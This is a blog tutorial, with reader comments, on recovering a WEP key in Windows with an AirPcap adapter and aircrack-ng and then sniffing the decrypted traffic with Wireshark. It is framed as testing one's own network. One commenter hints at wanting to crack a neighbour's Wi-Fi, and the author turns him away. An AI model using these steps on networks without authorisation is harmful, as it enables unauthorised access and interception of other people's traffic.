How to Crack WEP in Windows with Aircrack-ng and AirPcap

This guide demonstrates how to crack WEP in Windows using the AirPcap Wireless Capture Adapter. To do this, you'll need the useful AirPcap USB Wireless Capture Adapter from CACE Technologies. It's pretty cheap when compared to some of the other Windows hardware solutions, and you'll be supporting the makers of Wireshark!

Why Windows?

I adore Linux and the entire Open Source movement, but it's important to recognise that many people out there are locked into Windows; and learning an entirely new OS to perform security testing isn't cost-effective for their company.

How is WEP cracked?

To crack WEP, you need to exploit a weakness in its implementation, and collect lots of Initialisation Vectors (IVs). In normal WLAN traffic, it would take quite a while to pickup enough IVs - approximately 1 million - so we need to generate our own traffic. There's two ways we could do this:
  1. Generate your own traffic using iperf.
  2. Use packet injection using aireplay.
At present, the AirPcap Drivers do not support packet injection in Windows. Fortunately, the makers of AirPcap, CACE Technologies, have said packet injection will be included soon. :D Update 2007-06-11: Packet Injection is now possible in Windows with the AirPcap. Please see my posts: Cracking WEP with Cain and Cracking WEP with aircrack-ptw for more information.

What will you need?

  • An AirPcap Wireless Capture adapter. This is a great little tool for 802.11 sniffing in Windows. You can even run Kismet with it!
  • The Aircrack-ng for AirPcap release by CACE Technologies.
  • Your own Wireless Access Point, configured with WEP.
  • 3 computers, at least 1 of which should have a Wireless LAN Adapter.
  • Enough traffic to generate over 1 million IVs. For this demonstration, we'll use a Windows release of iperf, called K-perf, to generate lots of traffic.

Let's get cracking

This guide assumes that you are performing this on a WLAN you have permission to use. OK let's do it...

Set up Aircrack

Plug in your AirPcap. Extract the contents of the aircrack-ng release to C:\aircrack (or wherever, I'm just doing this for tidiness). Open up the c:\aircrack\bin\ directory and double-click the airodump-ng.exe (this is a specially built release tailored for AirPcap). Configure it as per your settings [Screenshot: Configuring Airodump-ng]

Generate some traffic

Install K-perf, then run J-perf — the Java front-end — on the two machines connected to the AP. At least one should be connected via Wireless. Set one up as a server, and the other as a client. Remember, we're just doing this to generate enough traffic on our demo WLAN. On the Server, choose the 'Server' option, then click Run. [Screenshot: Server, Configure K-perf using the Java front-end, J-perf.] On the Client, type in the Server's IP address, configure the time iperf should run to 1200, and click Run. [Screenshot: Client, Configure K-perf]

Capture and Crack

Go back to your AirPcap machine and watch the IV frames come in. [Screenshot: Airodump-ng capturing WEP IVs] When you've hit over 1,000,000 frames, open up aircrack-ng_GUI.exe in the c:\aircrack\bin\ directory. Click the Aircrack-ng tab, and locate your crackme.iv file. Click launch and wait for the cracker to find your WEP key. [Screenshot: Airocrack-ng cracking WEP] If aircrack cannot find your WEP key, you may not have enough IVs. To get more IVs, start up airodump-ng.exe again, and when asked the Output filename prefix, give the same name as you did previously. Airodump-ng will then append packets to the original dump.

What next?

Traffic capture

As this is a simulation, now that you have your WEP key, you can continue your penetration testing by using AirPcap with Wireshark to capture all the traffic flowing over your WPA or WEP-enabled WLAN.

Educate!

As one of the aims of my blog is to help people, if you have friends/neighbours/co-workers whose WLANs are WEP enabled, you could demonstrate how easy it is to crack WEP, and then help them set up a properly-implemented WPA/WPA2 WLAN :) Did this help you at all? Any questions? Feel free to leave me a comment below!

8 thoughts on “How to Crack WEP in Windows with Aircrack-ng and AirPcap

  1. Xavier

    Hi there

    Well which is the exact use of the 125 GBP “AirPcap USB Wireless Capture Adapter” when using WireShark? Perhaps my seven years in the field made me dumb or lazy but…

    Do you mean you REALLY can decrypt any (except well configured WPA networks) WPA stuff? Also, does the adapter run under Vista Ultimate? Or do you “suppose” it should? Anyway I was impressed, very nice job,

    All the best

  2. Phil Wiffen Post author

    Hi Xavier,

    The standard AirPcap is intended to allow passive sniffing and raw access to 802.11 packets in Windows. What this means is that Wireshark can now sniff raw 802.11 packets, which is useful for 802.11 diagnostics. Previously, as far as I’m aware, this was only possible by using Linux.

    My “What next?” explanation is a little fuzzy. What I’m trying to say is that, as you are supposed to be doing a security audit, once you have the WEP key, you can use Wireshark to decrypt the WEP packets and start to capture everything flowing over the network. The WPA part I mentioned relies on you either knowing the key, or cracking it using the EAPOL weakness. If you’re a Network Admin, being able to use Wireshark on 802.11 networks can be highly valuable during network troubleshooting.

    I hope that clears things up! If you have any other questions, don’t hesitate to ask :)

  3. guyfred

    hi there,

    I would like to ask is there a way to generate enough traffic to WEP protected wireless router using only windows XP an how can i do this?
    Thanks in advance..

  4. Jozsef Madaras

    Good evening,

    I have an IBM T42 laptop with Intel(R) PRO/Wireless 2200BG Network Connection wireless card. I use Windows XP as an operation system.
    I am not a very well educated PC technician but I like to explore the Windows programs myself.
    I haven’t done before a WEP crack procedure. And I didn’t find exactly how to do this with my wireless card.
    I’d like to get a step-by-step instruction as I have some possibilities to use a WEP with mainly 5 green signals (maybe my very neighbour uses it).
    Please write me back to:

    madarasjozsef@lycos.com

    Thanks a lot! All the best,

    Jozsef Madaras /simply You can call me Joe/

  5. Phil Wiffen Post author

    Jozsef: Due to your situation – not being tech-savvy – I’d recommend you either: Ask your neighbour if you can give them a little money to share their Wi-Fi connection, or if you really want to learn about cracking WEP with your card, search the internet for any of the numerous tutorials on using Linux and aircrack-ng.

Comments are closed.